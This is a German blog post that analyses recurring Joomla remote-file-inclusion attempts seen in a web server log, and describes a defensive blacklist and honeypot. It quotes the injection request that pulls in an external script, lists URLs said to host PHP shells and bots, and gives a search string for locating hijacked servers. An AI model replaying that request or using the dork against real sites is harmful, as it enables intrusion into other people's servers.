Schon seit längerer Zeit sichte ich in meinem Webserver Logfile immer wieder die selben mysteriösen Einträge:
81.13.86.150 “GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?”
Heute habe ich mir Zeit genommen, um diese seltsamen Einträge in meinem Log ein bisschen genauer unter die Lupe zu nehmen. Folgendes konnte ich bis jetzt in Erfahrung bringen:
Es ist offensichtlich, dass immer wieder versucht wird, ein Fremdes Script über das (auf meinem Webserver nicht vorhandene) PHP-Script “selfclass.php” auf den Webserver zu schmuggeln. Bis jetzt habe ich das Script “id.txt” auf den folgenden Webservern gesichtet:
http://www.gumgangfarm.com/shop/data/id.txt
http://opsz.3x.ro/safeon.txt
Das PHP-Script components/com_sef/sefclass.php, über welches versucht wird den Fremden Code ein zu schleusen, gehört zu dem Content Management System (CMS) Joomla!. Ich gehe davon aus, dass in einer älteren Version von Joomla! ein Fehler in diesem Script gefunden wurde und nun Scriptkiddies versuchen, diese Schwachstelle in noch ungepatchten Systemen auszunutzen.
Zurück zum mysteriösen Script id.txt: Speichert man dieses als PHP-Datei ab und ruft es auf, erscheint folgende Zeile im Webbrowser:
By-the-way: Wir wissen also nun, dass sich der Täter wahrscheinlich Mic22 nennt.
Ist das ausführen dieses Scriptes auf einem Webserver erfolgreich und erscheint der obere Code (in diesem Fall wäre das Script selfclass.php verwundbar), wird eine PHP-Shell oder ein ShellBot installiert. In meinem Fall wurde versucht über das selbe Fehlerhafte Script den folgenden ShellBot zu installieren: bl4cks.com/sistem/alat/scanuk.txt. Sieht man sich den Quellcode des Bot’s an, findet man folgende Zeile:
#Mic22 Is Here!
Natürlich ist Mic22 nicht der einzige, welcher Schwachstellen in bekannten Webapplikationen ausnützt um fremde Webserver zu kapern und darauf seine ShellBots installiert. Hier noch ein paar weitere Domains, welche Shells aller Art hosten:
http://test.iearn.uz/test.iearn.uz/help.txt
http://chmod.altervista.org/modalita/cmd2.txt
http://test.shell.tor.hu/ait.txt
http://vsfuzi.com/fuzi/safeon.txt
Mit den folgenden Begriffen lassen sich übrigens sehr viele Shells und gekaperte Rechner aufspüren google.ch filetype:txt + Mic22 -AWSTATS. Vielleicht findet ihr ja auch euren Webserver als Shell-Hoster wieder.
Aufspüren der verdächtigen Log-Einträgen
Solche Einträge wie im oben genannten Beispiel lassen sich ziemlich einfach finden:
Blacklist
Wie ihr wisst, betreibe ich die abuse.ch HTTP abuser list in welcher IP-Adressen von Scriptkiddies und Hackern gesammelt werden, um dann den Zugriff von diesen IP-Adressen per .htaccess Datei oder dem WP Ban Plugin zu blockieren. Ich habe nun ebenfalls ein Honeypot eingerichtet, welcher gekaperte Webserver einfängt und mit “hijacked Webserver” in die Blacklist einträgt.
abuse.ch HTTP abuser list: LINK
Tipps
Ein paar kleine Tipps:
